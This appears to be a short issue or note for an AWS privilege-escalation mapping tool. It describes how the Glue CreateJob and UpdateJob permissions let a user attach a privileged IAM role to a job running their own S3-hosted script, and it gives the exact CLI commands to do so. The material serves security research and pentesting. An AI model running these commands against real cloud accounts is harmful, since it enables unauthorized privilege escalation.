Glue Job Edge

[wdahlenburg]

Glue Jobs are missed edges currently.

The glue:CreateJob privilege can be used to create a new job with an associated role. Similarly the glue:UpdateJob privilege can be used to update existing jobs.

This technique is a bit quicker to abuse than dev endpoints as the dev endpoints take a few minutes to spin up.

Create a Job

# Copy the job code into an S3 bucket
$ aws s3 cp job.py s3://bucket/job.py

# Create the job
$ aws glue create-job --name glue-job --role arn:aws:iam::000000000000:role/Glue-Admin --command Name=pythonshell,ScriptLocation=s3://bucket/job.py,PythonVersion=3

# Run the job
$ aws glue start-job-run --job-name glue-job

Update an existing job

$ aws glue update-job --job-name glue-job --job-update 'Role=arn:aws:iam::000000000000:role/Glue-Admin,Command={Name=pythonshell,ScriptLocation=s3://bucket/job.py,PythonVersion=3}'